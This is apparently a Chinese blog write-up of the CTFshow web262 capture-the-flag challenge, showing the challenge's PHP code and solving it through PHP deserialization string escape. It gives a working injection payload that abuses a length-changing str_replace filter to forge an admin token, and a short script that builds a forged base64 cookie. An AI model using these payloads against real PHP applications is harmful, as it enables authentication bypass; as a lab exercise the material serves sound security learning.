CTFshow-WEB入门-反序列化web262

题目代码

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 02:37:19
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}
$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];
if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}
highlight_file(__FILE__);

可以看出来传三个值会得到一个message序列化的Cookie

根据注释查看message.php

<?php
highlight_file(__FILE__);
include('flag.php');
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}
if(isset($_COOKIE['msg'])){
    $msg = unserialize(base64_decode($_COOKIE['msg']));
    if($msg->token=='admin'){
        echo $flag;
    }
}

会将上个页面拿到的cookie反序列化,如果token=='admin'就可以拿到flag

但是正常情况下token会被设为user,所以我们需要注入to进行反序列化字符串逃逸

正常情况下的序列化字符串?f=1&m=2&t=3——O:7:"message":4:{s:4:"from";i:1;s:3:"msg";i:2;s:2:"to";i:3;s:5:"token";s:4:"user";}

当t=3";s:5:"token";s:5:"admin";}时——————O:7:"message":4:{s:4:"from";i:1;s:3:"msg";i:2;s:2:"to";s:28:"3";s:5:"token";s:5:"admin";}";s:5:"token";s:4:"user";}

反序列化的时候会以;}结尾,后面的红色部分会无效化

但是因为s:28:"3";数量不正确,所以不能正常反序列化,需要通过题目中的str_replace('fuck', 'loveU', serialize($msg));进行绕过

当t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}时

序列化字符串数量正确——O:7:"message":4:{s:4:"from";i:1;s:3:"msg";i:2;s:2:"to";s:135:"loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU";s:5:"token";s:5:"admin";}";s:5:"token";s:4:"user";}

 

另一种方法,直接生成token=='admin'的序列化字符串的base64编码,然后加到Cookie里

<?php
class message{
    public $token='admin';
}
echo base64_encode(serialize(new message()));
posted @ 2022-11-11 16:58  Hacker&Cat  阅读(156)  评论(0编辑  收藏  举报